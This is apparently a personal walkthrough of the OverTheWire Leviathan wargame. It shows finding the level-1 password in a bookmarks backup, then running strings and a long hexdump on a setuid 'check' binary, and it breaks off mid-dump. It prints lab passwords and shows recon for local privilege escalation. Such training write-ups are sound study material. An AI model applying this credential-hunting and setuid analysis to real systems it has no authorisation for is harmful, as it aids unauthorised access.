URL :- http://overthewire.org/wargames/leviathan/

SSH -> leviathan.labs.overthewire.org

Process ->
1.) file
2.) hexdump
3.) Disassemble main
4.) ltrace

Leviathan Level 0 → Level 1
Login -> leviathan0
Password -> leviathan0
leviathan0@melinda:~$ ls -lah
total 24K
drwxr-xr-x   3 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 167 root       root       4.0K Jul  9  2015 ..
drwxr-x---   2 leviathan1 leviathan0 4.0K Jan 30 02:43 .backup
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
leviathan0@melinda:~$ cd .backup/
leviathan0@melinda:~/.backup$ ls -lah
total 140K
drwxr-x--- 2 leviathan1 leviathan0 4.0K Jan 30 02:43 .
drwxr-xr-x 3 root       root       4.0K Nov 14  2014 ..
-rw-r----- 1 leviathan1 leviathan0 131K Nov 14  2014 bookmarks.html
leviathan0@melinda:~/.backup$ cat bookmarks.html | grep leviathan
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is rioGegei8m" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to leviathan1</A>
leviathan0@melinda:~/.backup$

Leviathan Level 1 → Level 2
Login -> leviathan1
Password -> rioGegei8m
leviathan1@melinda:~$ ls -lah
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 167 root       root       4.0K Jul  9  2015 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan2 leviathan1 7.4K Nov 14  2014 check
leviathan1@melinda:~$ file check
check: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0d17ae20f672ebc7d440bb4562277561cc60f2d0, not stripped
leviathan1@melinda:~$ strings check
/lib/ld-linux.so.2
Eb'ua
libc.so.6
_IO_stdin_used
puts
__stack_chk_fail
printf
getchar
system
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.4
GLIBC_2.0
PTRh`
QVh-
D$,1
D$%secrf
D$)et
D$ love
T$,e3
[^_]
password:
/bin/sh
Wrong password, Good Bye ...
;*2$"
GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
crtstuff.c
__JCR_LIST__
deregister_tm_clones
register_tm_clones
__do_global_dtors_aux
completed.6590
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
check.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
strcmp@@GLIBC_2.0
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
data_start
printf@@GLIBC_2.0
getchar@@GLIBC_2.0
_edata
_fini
__stack_chk_fail@@GLIBC_2.4
__data_start
puts@@GLIBC_2.0
system@@GLIBC_2.0
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
_end
_start
_fp_hw
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
_init
leviathan1@melinda:~$ hexdump -C check
00000000  7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|
00000010  02 00 03 00 01 00 00 00  30 84 04 08 34 00 00 00  |........0...4...|
00000020  60 11 00 00 00 00 00 00  34 00 20 00 09 00 28 00  |`.......4. ...(.|
00000030  1e 00 1b 00 06 00 00 00  34 00 00 00 34 80 04 08  |........4...4...|
00000040  34 80 04 08 20 01 00 00  20 01 00 00 05 00 00 00  |4... ... .......|
00000050  04 00 00 00 03 00 00 00  54 01 00 00 54 81 04 08  |........T...T...|
00000060  54 81 04 08 13 00 00 00  13 00 00 00 04 00 00 00  |T...............|
00000070  01 00 00 00 01 00 00 00  00 00 00 00 00 80 04 08  |................|
00000080  00 80 04 08 8c 07 00 00  8c 07 00 00 05 00 00 00  |................|
00000090  00 10 00 00 01 00 00 00  08 0f 00 00 08 9f 04 08  |................|
000000a0  08 9f 04 08 2c 01 00 00  30 01 00 00 06 00 00 00  |....,...0.......|
000000b0  00 10 00 00 02 00 00 00  14 0f 00 00 14 9f 04 08  |................|
000000c0  14 9f 04 08 e8 00 00 00  e8 00 00 00 06 00 00 00  |................|
000000d0  04 00 00 00 04 00 00 00  68 01 00 00 68 81 04 08  |........h...h...|
000000e0  68 81 04 08 44 00 00 00  44 00 00 00 04 00 00 00  |h...D...D.......|
000000f0  04 00 00 00 50 e5 74 64  b0 06 00 00 b0 86 04 08  |....P.td........|
00000100  b0 86 04 08 2c 00 00 00  2c 00 00 00 04 00 00 00  |....,...,.......|
00000110  04 00 00 00 51 e5 74 64  00 00 00 00 00 00 00 00  |....Q.td........|
00000120  00 00 00 00 00 00 00 00  00 00 00 00 06 00 00 00  |................|
00000130  10 00 00 00 52 e5 74 64  08 0f 00 00 08 9f 04 08  |....R.td........|
00000140  08 9f 04 08 f8 00 00 00  f8 00 00 00 04 00 00 00  |................|
00000150  01 00 00 00 2f 6c 69 62  2f 6c 64 2d 6c 69 6e 75  |..../lib/ld-linu|
00000160  78 2e 73 6f 2e 32 00 00  04 00 00 00 10 00 00 00  |x.so.2..........|
00000170  01 00 00 00 47 4e 55 00  00 00 00 00 02 00 00 00  |....GNU.........|
00000180  06 00 00 00 18 00 00 00  04 00 00 00 14 00 00 00  |................|
00000190  03 00 00 00 47 4e 55 00  0d 17 ae 20 f6 72 eb c7  |....GNU.... .r..|
000001a0  d4 40 bb 45 62 27 75 61  cc 60 f2 d0 02 00 00 00  |.@.Eb'ua.`......|
000001b0  09 00 00 00 01 00 00 00  05 00 00 00 00 20 00 20  |............. . |
000001c0  00 00 00 00 09 00 00 00  ad 4b e3 c0 00 00 00 00  |.........K......|
000001d0  00 00 00 00 00 00 00 00  00 00 00 00 46 00 00 00  |............F...|
000001e0  00 00 00 00 00 00 00 00  12 00 00 00 30 00 00 00  |............0...|
000001f0  00 00 00 00 00 00 00 00  12 00 00 00 37 00 00 00  |............7...|
00000200  00 00 00 00 00 00 00 00  12 00 00 00 1f 00 00 00  |................|
00000210  00 00 00 00 00 00 00 00  12 00 00 00 1a 00 00 00  |................|
00000220  00 00 00 00 00 00 00 00  12 00 00 00 3f 00 00 00  |............?...|
00000230  00 00 00 00 00 00 00 00  12 00 00 00 5f 00 00 00  |............_...|
00000240  00 00 00 00 00 00 00 00  20 00 00 00 4d 00 00 00  |........ ...M...|
00000250  00 00 00 00 00 00 00 00  12 00 00 00 0b 00 00 00  |................|
00000260  7c 86 04 08 04 00 00 00  11 00 0f 00 00 6c 69 62  ||............lib|
00000270  63 2e 73 6f 2e 36 00 5f  49 4f 5f 73 74 64 69 6e  |c.so.6._IO_stdin|
00000280  5f 75 73 65 64 00 70 75  74 73 00 5f 5f 73 74 61  |_used.puts.__sta|
00000290  63 6b 5f 63 68 6b 5f 66  61 69 6c 00 70 72 69 6e  |ck_chk_fail.prin|
000002a0  74 66 00 67 65 74 63 68  61 72 00 73 79 73 74 65  |tf.getchar.syste|
000002b0  6d 00 73 74 72 63 6d 70  00 5f 5f 6c 69 62 63 5f  |m.strcmp.__libc_|
000002c0  73 74 61 72 74 5f 6d 61  69 6e 00 5f 5f 67 6d 6f  |start_main.__gmo|
000002d0  6e 5f 73 74 61 72 74 5f  5f 00 47 4c 49 42 43 5f  |n_start__.GLIBC_|
000002e0  32 2e 34 00 47 4c 49 42  43 5f 32 2e 30 00 00 00  |2.4.GLIBC_2.0...|
000002f0  02 00 02 00 02 00 03 00  02 00 02 00 00 00 02 00  |................|
00000300  01 00 00 00 01 00 02 00  01 00 00 00 10 00 00 00  |................|
00000310  00 00 00 00 14 69 69 0d  00 00 03 00 6e 00 00 00  |.....ii.....n...|
00000320  10 00 00 00 10 69 69 0d  00 00 02 00 78 00 00 00  |.....ii.....x...|
00000330  00 00 00 00 fc 9f 04 08  06 07 00 00 0c a0 04 08  |................|
00000340  07 01 00 00 10 a0 04 08  07 02 00 00 14 a0 04 08  |................|
00000350  07 03 00 00 18 a0 04 08  07 04 00 00 1c a0 04 08  |................|
00000360  07 05 00 00 20 a0 04 08  07 06 00 00 24 a0 04 08  |.... .......$...|
00000370  07 07 00 00 28 a0 04 08  07 08 00 00 53 83 ec 08  |....(.......S...|
00000380  e8 db 00 00 00 81 c3 7b  1c 00 00 8b 83 fc ff ff  |.......{........|
00000390  ff 85 c0 74 05 e8 76 00  00 00 83 c4 08 5b c3 00  |...t..v......[..|
000003a0  ff 35 04 a0 04 08 ff 25  08 a0 04 08 00 00 00 00  |.5.....%........|
000003b0  ff 25 0c a0 04 08 68 00  00 00 00 e9 e0 ff ff ff  |.%....h.........|
000003c0  ff 25 10 a0 04 08 68 08  00 00 00 e9 d0 ff ff ff  |.%....h.........|
000003d0  ff 25 14 a0 04 08 68 10  00 00 00 e9 c0 ff ff ff  |.%....h.........|
000003e0  ff 25 18 a0 04 08 68 18  00 00 00 e9 b0 ff ff ff  |.%....h.........|
000003f0  ff 25 1c a0 04 08 68 20  00 00 00 e9 a0 ff ff ff  |.%....h ........|
00000400  ff 25 20 a0 04 08 68 28  00 00 00 e9 90 ff ff ff  |.% ...h(........|
00000410  ff 25 24 a0 04 08 68 30  00 00 00 e9 80 ff ff ff  |.%$...h0........|
00000420  ff 25 28 a0 04 08 68 38  00 00 00 e9 70 ff ff ff  |.%(...h8....p...|
00000430  31 ed 5e 89 e1 83 e4 f0  50 54 52 68 60 86 04 08  |1.^.....PTRh`...|
00000440  68 f0 85 04 08 51 56 68  2d 85 04 08 e8 cf ff ff  |h....QVh-.......|
00000450  ff f4 66 90 66 90 66 90  66 90 66 90 66 90 66 90  |..f.f.f.f.f.f.f.|
00000460  8b 1c 24 c3 66 90 66 90  66 90 66 90 66 90 66 90  |..$.f.f.f.f.f.f.|
00000470  b8 37 a0 04 08 2d 34 a0  04 08 83 f8 06 77 01 c3  |.7...-4......w..|
00000480  b8 00 00 00 00 85 c0 74  f6 55 89 e5 83 ec 18 c7  |.......t.U......|
00000490  04 24 34 a0 04 08 ff d0  c9 c3 8d b6 00 00 00 00  |.$4.............|
000004a0  b8 34 a0 04 08 2d 34 a0  04 08 c1 f8 02 89 c2 c1  |.4...-4.........|
000004b0  ea 1f 01 d0 d1 f8 75 01  c3 ba 00 00 00 00 85 d2  |......u.........|
000004c0  74 f6 55 89 e5 83 ec 18  89 44 24 04 c7 04 24 34  |t.U......D$...$4|
000004d0  a0 04 08 ff d2 c9 c3 89  f6 8d bc 27 00 00 00 00  |...........'....|
000004e0  80 3d 34 a0 04 08 00 75  13 55 89 e5 83 ec 08 e8  |.=4....u.U......|
000004f0  7c ff ff ff c6 05 34 a0  04 08 01 c9 f3 c3 66 90  ||.....4.......f.|
00000500  a1 10 9f 04 08 85 c0 74  1f b8 00 00 00 00 85 c0  |.......t........|
00000510  74 16 55 89 e5 83 ec 18  c7 04 24 10 9f 04 08 ff  |t.U.......$.....|
00000520  d0 c9 e9 79 ff ff ff 90  e9 73 ff ff ff 55 89 e5  |...y.....s...U..|
00000530  83 e4 f0 83 ec 30 65 a1  14 00 00 00 89 44 24 2c  |.....0e......D$,|
00000540  31 c0 c7 44 24 18 73 65  78 00 c7 44 24 25 73 65  |1..D$.sex..D$%se|
00000550  63 72 66 c7 44 24 29 65  74 c6 44 24 2b 00 c7 44  |crf.D$)et.D$+..D|
00000560  24 1c 67 6f 64 00 c7 44  24 20 6c 6f 76 65 c6 44  |$.god..D$ love.D|
00000570  24 24 00 c7 04 24 80 86  04 08 e8 41 fe ff ff e8  |$$...$.....A....|
00000580  4c fe ff ff 88 44 24 14  e8 43 fe ff ff 88 44 24  |L....D$..C....D$|
00000590  15 e8 3a fe ff ff 88 44  24 16 c6 44 24 17 00 8d  |..:....D$..D$...|
000005a0  44 24 18 89 44 24 04 8d  44 24 14 89 04 24 e8 fd  |D$..D$..D$...$..|
000005b0  fd ff ff 85 c0 75 0e c7  04 24 8b 86 04 08 e8 3d  |.....u...$.....=|
000005c0  fe ff ff eb 0c c7 04 24  93 86 04 08 e8 1f fe ff  |.......$........|
000005d0  ff b8 00 00 00 00 8b 54  24 2c 65 33 15 14 00 00  |.......T$,e3....|
000005e0  00 74 05 e8 f8 fd ff ff  c9 c3 66 90 66 90 66 90  |.t........f.f.f.|
000005f0  55 57 31 ff 56 53 e8 65  fe ff ff 81 c3 05 1a 00  |UW1.VS.e........|
00000600  00 83 ec 1c 8b 6c 24 30  8d b3 0c ff ff ff e8 69  |.....l$0.......i|
00000610  fd ff ff 8d 83 08 ff ff  ff 29 c6 c1 fe 02 85 f6  |.........)......|
00000620  74 27 8d b6 00 00 00 00  8b 44 24 38 89 2c 24 89  |t'.......D$8.,$.|
00000630  44 24 08 8b 44 24 34 89  44 24 04 ff 94 bb 08 ff  |D$..D$4.D$......|
00000640  ff ff 83 c7 01 39 f7 75  df 83 c4 1c 5b 5e 5f 5d  |.....9.u....[^_]|
00000650  c3 eb 0d 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000660  f3 c3 00 00 53 83 ec 08  e8 f3 fd ff ff 81 c3 93  |....S...........|
00000670  19 00 00 83 c4 08 5b c3  03 00 00 00 01 00 02 00  |......[.........|
00000680  70 61 73 73 77 6f 72 64  3a 20 00 2f 62 69 6e 2f  |password: ./bin/|
00000690  73 68 00 57 72 6f 6e 67  20 70 61 73 73 77 6f 72  |sh.Wrong passwor|
000006a0  64 2c 20 47 6f 6f 64 20  42 79 65 20 2e 2e 2e 00  |d, Good Bye ....|
000006b0  01 1b 03 3b 28 00 00 00  04 00 00 00 f0 fc ff ff  |...;(...........|
000006c0  44 00 00 00 7d fe ff ff  68 00 00 00 40 ff ff ff  |D...}...h...@...|
000006d0  88 00 00 00 b0 ff ff ff  c4 00 00 00 14 00 00 00  |................|
000006e0  00 00 00 00 01 7a 52 00  01 7c 08 01 1b 0c 04 04  |.....zR..|......|
000006f0  88 01 00 00 20 00 00 00  1c 00 00 00 a4 fc ff ff  |.... ...........|
00000700  90 00 00 00 00 0e 08 46  0e 0c 4a 0f 0b 74 04 78  |.......F..J..t.x|
00000710  00 3f 1a 3b 2a 32 24 22  1c 00 00 00 40 00 00 00  |.?.;*2$"....@...|
00000720  0d fe ff ff bd 00 00 00  00 41 0e 08 85 02 42 0d  |.........A....B.|
00000730  05 02 b9 c5 0c 04 04 00  38 00 00 00 60 00 00 00  |........8...`...|
00000740  b0 fe ff ff 61 00 00 00  00 41 0e 08 85 02 41 0e  |....a....A....A.|
00000750  0c 87 03 43 0e 10 86 04  41 0e 14 83 05 4e 0e 30  |...C....A....N.0|
00000760  02 48 0e 14 41 c3 0e 10  41 c6 0e 0c 41 c7 0e 08  |.H..A...A...A...|
00000770  41 c5 0e 04 10 00 00 00  9c 00 00 00 e4 fe ff ff  |A...............|
00000780  02 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000790  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000f00  00 00 00 00 00 00 00 00  00 85 04 08 e0 84 04 08  |................|
00000f10  00 00 00 00 01 00 00 00  01 00 00 00 0c 00 00 00  |................|
00000f20  7c 83 04 08 0d 00 00 00  64 86 04 08 19 00 00 00  ||.......d.......|
00000f30  08 9f 04 08 1b 00 00 00  04 00 00 00 1a 00 00 00  |................|
00000f40  0c 9f 04 08 1c 00 00 00  04 00 00 00 f5 fe ff 6f  |...............o|
00000f50  ac 81 04 08 05 00 00 00  6c 82 04 08 06 00 00 00  |........l.......|
00000f60  cc 81 04 08 0a 00 00 00  82 00 00 00 0b 00 00 00  |................|
00000f70  10 00 00 00 15 00 00 00  00 00 00 00 03 00 00 00  |................|
00000f80  00 a0 04 08 02 00 00 00  40 00 00 00 14 00 00 00  |........@.......|
00000f90  11 00 00 00 17 00 00 00  3c 83 04 08 11 00 00 00  |........<.......|
00000fa0  34 83 04 08 12 00 00 00  08 00 00 00 13 00 00 00  |4...............|
00000fb0  08 00 00 00 fe ff ff 6f  04 83 04 08 ff ff ff 6f  |.......o.......o|
00000fc0  01 00 00 00 f0 ff ff 6f  ee 82 04 08 00 00 00 00  |.......o........|
00000fd0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000  14 9f 04 08 00 00 00 00  00 00 00 00 b6 83 04 08  |................|
00001010  c6 83 04 08 d6 83 04 08  e6 83 04 08 f6 83 04 08  |................|
00001020  06 84 04 08 16 84 04 08  26 84 04 08 00 00 00 00  |........&.......|
00001030  00 00 00 00 47 43 43 3a  20 28 55 62 75 6e 74 75  |....GCC: (Ubuntu|
00001040  20 34 2e 38 2e 32 2d 31  39 75 62 75 6e 74 75 31  | 4.8.2-19ubuntu1|
00001050  29 20 34 2e 38 2e 32 00  00 2e 73 79 6d 74 61 62  |) 4.8.2...symtab|
00001060  00 2e 73 74 72 74 61 62  00 2e 73 68 73 74 72 74  |..strtab..shstrt|
00001070  61 62 00 2e 69 6e 74 65  72 70 00 2e 6e 6f 74 65  |ab..interp..note|
00001080  2e 41 42 49 2d 74 61 67  00 2e 6e 6f 74 65 2e 67  |.ABI-tag..note.g|
00001090  6e 75 2e 62 75 69 6c 64  2d 69 64 00 2e 67 6e 75  |nu.build-id..gnu|
000010a0  2e 68 61 73 68 00 2e 64  79 6e 73 79 6d 00 2e 64  |.hash..dynsym..d|
000010b0  79 6e 73 74 72 00 2e 67  6e 75 2e 76 65 72 73 69  |ynstr..gnu.versi|
000010c0  6f 6e 00 2e 67 6e 75 2e  76 65 72 73 69 6f 6e 5f  |on..gnu.version_|
000010d0  72 00 2e 72 65 6c 2e 64  79 6e 00 2e 72 65 6c 2e  |r..rel.dyn..rel.|
000010e0  70 6c 74 00 2e 69 6e 69  74 00 2e 74 65 78 74 00  |plt..init..text.|
000010f0  2e 66 69 6e 69 00 2e 72  6f 64 61 74 61 00 2e 65  |.fini..rodata..e|
00001100  68 5f 66 72 61 6d 65 5f  68 64 72 00 2e 65 68 5f  |h_frame_hdr..eh_|
00001110  66 72 61 6d 65 00 2e 69  6e 69 74 5f 61 72 72 61  |frame..init_arra|
00001120  79 00 2e 66 69 6e 69 5f  61 72 72 61 79 00 2e 6a  |y..fini_array..j|
00001130  63 72 00 2e 64 79 6e 61  6d 69 63 00 2e 67 6f 74  |cr..dynamic..got|
00001140  00 2e 67 6f 74 2e 70 6c  74 00 2e 64 61 74 61 00  |..got.plt..data.|
00001150  2e 62 73 73 00 2e 63 6f  6d 6d 65 6e 74 00 00 00  |.bss..comment...|
00001160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001180  00 00 00 00 00 00 00 00  1b 00 00 00 01 00 00 00  |................|
00001190  02 00 00 00 54 81 04 08  54 01 00 00 13 00 00 00  |....T...T.......|
000011a0  00 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00  |................|
000011b0  23 00 00 00 07 00 00 00  02 00 00 00 68 81 04 08  |#...........h...|
000011c0  68 01 00 00 20 00 00 00  00 00 00 00 00 00 00 00  |h... ...........|
000011d0  04 00 00 00 00 00 00 00  31 00 00 00 07 00 00 00  |........1.......|
000011e0  02 00 00 00 88 81 04 08  88 01 00 00 24 00 00 00  |............$...|
000011f0  00 00 00 00 00 00 00 00  04 00 00 00 00 00 00 00  |................|
00001200  44 00 00 00 f6 ff ff 6f  02 00 00 00 ac 81 04 08  |D......o........|
00001210  ac 01 00 00 20 00 00 00  05 00 00 00 00 00 00 00  |.... ...........|
00001220  04 00 00 00 04 00 00 00  4e 00 00 00 0b 00 00 00  |........N.......|
00001230  02 00 00 00 cc 81 04 08  cc 01 00 00 a0 00 00 00  |................|
00001240  06 00 00 00 01 00 00 00  04 00 00 00 10 00 00 00  |................|
00001250  56 00 00 00 03 00 00 00  02 00 00 00 6c 82 04 08  |V...........l...|
00001260  6c 02 00 00 82 00 00 00  00 00 00 00 00 00 00 00  |l...............|
00001270  01 00 00 00 00 00 00 00  5e 00 00 00 ff ff ff 6f  |........^......o|
00001280  02 00 00 00 ee 82 04 08  ee 02 00 00 14 00 00 00  |................|
00001290  05 00 00 00 00 00 00 00  02 00 00 00 02 00 00 00  |................|
000012a0  6b 00 00 00 fe ff ff 6f  02 00 00 00 04 83 04 08  |k......o........|
000012b0  04 03 00 00 30 00 00 00  06 00 00 00 01 00 00 00  |....0...........|
000012c0  04 00 00 00 00 00 00 00  7a 00 00 00 09 00 00 00  |........z.......|
000012d0  02 00 00 00 34 83 04 08  34 03 00 00 08 00 00 00  |....4...4.......|
000012e0  05 00 00 00 00 00 00 00  04 00 00 00 08 00 00 00  |................|
000012f0  83 00 00 00 09 00 00 00  02 00 00 00 3c 83 04 08  |............<...|
00001300  3c 03 00 00 40 00 00 00  05 00 00 00 0c 00 00 00  |<...@...........|
00001310  04 00 00 00 08 00 00 00  8c 00 00 00 01 00 00 00  |................|
00001320  06 00 00 00 7c 83 04 08  7c 03 00 00 23 00 00 00  |....|...|...#...|
00001330  00 00 00 00 00 00 00 00  04 00 00 00 00 00 00 00  |................|
00001340  87 00 00 00 01 00 00 00  06 00 00 00 a0 83 04 08  |................|
00001350  a0 03 00 00 90 00 00 00  00 00 00 00 00 00 00 00  |................|
00001360  10 00 00 00 04 00 00 00  92 00 00 00 01 00 00 00  |................|
00001370  06 00 00 00 30 84 04 08  30 04 00 00 32 02 00 00  |....0...0...2...|
00001380  00 00 00 00 00 00 00 00  10 00 00 00 00 00 00 00  |................|
00001390  98 00 00 00 01 00 00 00  06 00 00 00 64 86 04 08  |............d...|
000013a0  64 06 00 00 14 00 00 00  00 00 00 00 00 00 00 00  |d...............|
000013b0  04 00 00 00 00 00 00 00  9e 00 00 00 01 00 00 00  |................|
000013c0  02 00 00 00 78 86 04 08  78 06 00 00 38 00 00 00  |....x...x...8...|
000013d0  00 00 00 00 00 00 00 00  04 00 00 00 00 00 00 00  |................|
000013e0  a6 00 00 00 01 00 00 00  02 00 00 00 b0 86 04 08  |................|
000013f0  b0 06 00 00 2c 00 00 00  00 00 00 00 00 00 00 00  |....,...........|
00001400  04 00 00 00 00 00 00 00  b4 00 00 00 01 00 00 00  |................|
00001410  02 00 00 00 dc 86 04 08  dc 06 00 00 b0 00 00 00  |................|
00001420  00 00 00 00 00 00 00 00  04 00 00 00 00 00 00 00  |................|
00001430  be 00 00 00 0e 00 00 00  03 00 00 00 08 9f 04 08  |................|
00001440  08 0f 00 00 04 00 00 00  00 00 00 00 00 00 00 00  |................|
00001450  04 00 00 00 00 00 00 00  ca 00 00 00 0f 00 00 00  |................|
00001460  03 00 00 00 0c 9f 04 08  0c 0f 00 00 04 00 00 00  |................|
00001470  00 00 00 00 00 00 00 00  04 00 00 00 00 00 00 00  |................|
00001480  d6 00 00 00 01 00 00 00  03 00 00 00 10 9f 04 08  |................|
00001490  10 0f 00 00 04 00 00 00  00 00 00 00 00 00 00 00  |................|
000014a0  04 00 00 00 00 00 00 00  db 00 00 00 06 00 00 00  |................|
000014b0  03 00 00 00 14 9f 04 08  14 0f 00 00 e8 00 00 00  |................|
000014c0  06 00 00 00 00 00 00 00  04 00 00 00 08 00 00 00  |................|
000014d0  e4 00 00 00 01 00 00 00  03 00 00 00 fc 9f 04 08  |................|
000014e0  fc 0f 00 00 04 00 00 00  00 00 00 00 00 00 00 00  |................|
000014f0  04 00 00 00 04 00 00 00  e9 00 00 00 01 00 00 00  |................|
00001500  03 00 00 00 00 a0 04 08  00 10 00 00 2c 00 00 00  |............,...|
00001510  00 00 00 00 00 00 00 00  04 00 00 00 04 00 00 00  |................|
00001520  f2 00 00 00 01 00 00 00  03 00 00 00 2c a0 04 08  |............,...|
00001530  2c 10 00 00 08 00 00 00  00 00 00 00 00 00 00 00  |,...............|
00001540  04 00 00 00 00 00 00 00  f8 00 00 00 08 00 00 00  |................|
00001550  03 00 00 00 34 a0 04 08  34 10 00 00 04 00 00 00  |....4...4.......|
00001560  00 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00  |................|
00001570  fd 00 00 00 01 00 00 00  30 00 00 00 00 00 00 00  |........0.......|
00001580  34 10 00 00 24 00 00 00  00 00 00 00 00 00 00 00  |4...$...........|
00001590  01 00 00 00 01 00 00 00  11 00 00 00 03 00 00 00  |................|
000015a0  00 00 00 00 00 00 00 00  58 10 00 00 06 01 00 00  |........X.......|
000015b0  00 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00  |................|
000015c0  01 00 00 00 02 00 00 00  00 00 00 00 00 00 00 00  |................|
000015d0  10 16 00 00 80 04 00 00  1d 00 00 00 2d 00 00 00  |............-...|
000015e0  04 00 00 00 10 00 00 00  09 00 00 00 03 00 00 00  |................|
000015f0  00 00 00 00 00 00 00 00  90 1a 00 00 b5 02 00 00  |................|
00001600  00 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00  |................|
00001610  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00001620  00 00 00 00 54 81 04 08  00 00 00 00 03 00 01 00  |....T...........|
00001630  00 00 00 00 68 81 04 08  00 00 00 00 03 00 02 00  |....h...........|
00001640  00 00 00 00 88 81 04 08  00 00 00 00 03 00 03 00  |................|
00001650  00 00 00 00 ac 81 04 08  00 00 00 00 03 00 04 00  |................|
00001660  00 00 00 00 cc 81 04 08  00 00 00 00 03 00 05 00  |................|
00001670  00 00 00 00 6c 82 04 08  00 00 00 00 03 00 06 00  |....l...........|
00001680  00 00 00 00 ee 82 04 08  00 00 00 00 03 00 07 00  |................|
00001690  00 00 00 00 04 83 04 08  00 00 00 00 03 00 08 00  |................|
000016a0  00 00 00 00 34 83 04 08  00 00 00 00 03 00 09 00  |....4...........|
000016b0  00 00 00 00 3c 83 04 08  00 00 00 00 03 00 0a 00  |....<...........|
000016c0  00 00 00 00 7c 83 04 08  00 00 00 00 03 00 0b 00  |....|...........|
000016d0  00 00 00 00 a0 83 04 08  00 00 00 00 03 00 0c 00  |................|
000016e0  00 00 00 00 30 84 04 08  00 00 00 00 03 00 0d 00  |....0...........|
000016f0  00 00 00 00 64 86 04 08  00 00 00 00 03 00 0e 00  |....d...........|
00001700  00 00 00 00 78 86 04 08  00 00 00 00 03 00 0f 00  |....x...........|
00001710  00 00 00 00 b0 86 04 08  00 00 00 00 03 00 10 00  |................|
00001720  00 00 00 00 dc 86 04 08  00 00 00 00 03 00 11 00  |................|
00001730  00 00 00 00 08 9f 04 08  00 00 00 00 03 00 12 00  |................|
00001740  00 00 00 00 0c 9f 04 08  00 00 00 00 03 00 13 00  |................|
00001750  00 00 00 00 10 9f 04 08  00 00 00 00 03 00 14 00  |................|
00001760  00 00 00 00 14 9f 04 08  00 00 00 00 03 00 15 00  |................|
00001770  00 00 00 00 fc 9f 04 08  00 00 00 00 03 00 16 00  |................|
00001780  00 00 00 00 00 a0 04 08  00 00 00 00 03 00 17 00  |................|
00001790  00 00 00 00 2c a0 04 08  00 00 00 00 03 00 18 00  |....,...........|
000017a0  00 00 00 00 34 a0 04 08  00 00 00 00 03 00 19 00  |....4...........|
000017b0  00 00 00 00 00 00 00 00  00 00 00 00 03 00 1a 00  |................|
000017c0  01 00 00 00 00 00 00 00  00 00 00 00 04 00 f1 ff  |................|
000017d0  0c 00 00 00 10 9f 04 08  00 00 00 00 01 00 14 00  |................|
000017e0  19 00 00 00 70 84 04 08  00 00 00 00 02 00 0d 00  |....p...........|
000017f0  2e 00 00 00 a0 84 04 08  00 00 00 00 02 00 0d 00  |................|
00001800  41 00 00 00 e0 84 04 08  00 00 00 00 02 00 0d 00  |A...............|
00001810  57 00 00 00 34 a0 04 08  01 00 00 00 01 00 19 00  |W...4...........|
00001820  66 00 00 00 0c 9f 04 08  00 00 00 00 01 00 13 00  |f...............|
00001830  8d 00 00 00 00 85 04 08  00 00 00 00 02 00 0d 00  |................|
00001840  99 00 00 00 08 9f 04 08  00 00 00 00 01 00 12 00  |................|
00001850  b8 00 00 00 00 00 00 00  00 00 00 00 04 00 f1 ff  |................|
00001860  01 00 00 00 00 00 00 00  00 00 00 00 04 00 f1 ff  |................|
00001870  c0 00 00 00 88 87 04 08  00 00 00 00 01 00 11 00  |................|
00001880  ce 00 00 00 10 9f 04 08  00 00 00 00 01 00 14 00  |................|
00001890  00 00 00 00 00 00 00 00  00 00 00 00 04 00 f1 ff  |................|
000018a0  da 00 00 00 0c 9f 04 08  00 00 00 00 00 00 12 00  |................|
000018b0  eb 00 00 00 14 9f 04 08  00 00 00 00 01 00 15 00  |................|
000018c0  f4 00 00 00 08 9f 04 08  00 00 00 00 00 00 12 00  |................|
000018d0  07 01 00 00 00 a0 04 08  00 00 00 00 01 00 17 00  |................|
000018e0  1d 01 00 00 60 86 04 08  02 00 00 00 12 00 0d 00  |....`...........|
000018f0  2d 01 00 00 00 00 00 00  00 00 00 00 12 00 00 00  |-...............|
00001900  3f 01 00 00 00 00 00 00  00 00 00 00 20 00 00 00  |?........... ...|
00001910  5b 01 00 00 60 84 04 08  04 00 00 00 12 02 0d 00  |[...`...........|
00001920  71 01 00 00 2c a0 04 08  00 00 00 00 20 00 18 00  |q...,....... ...|
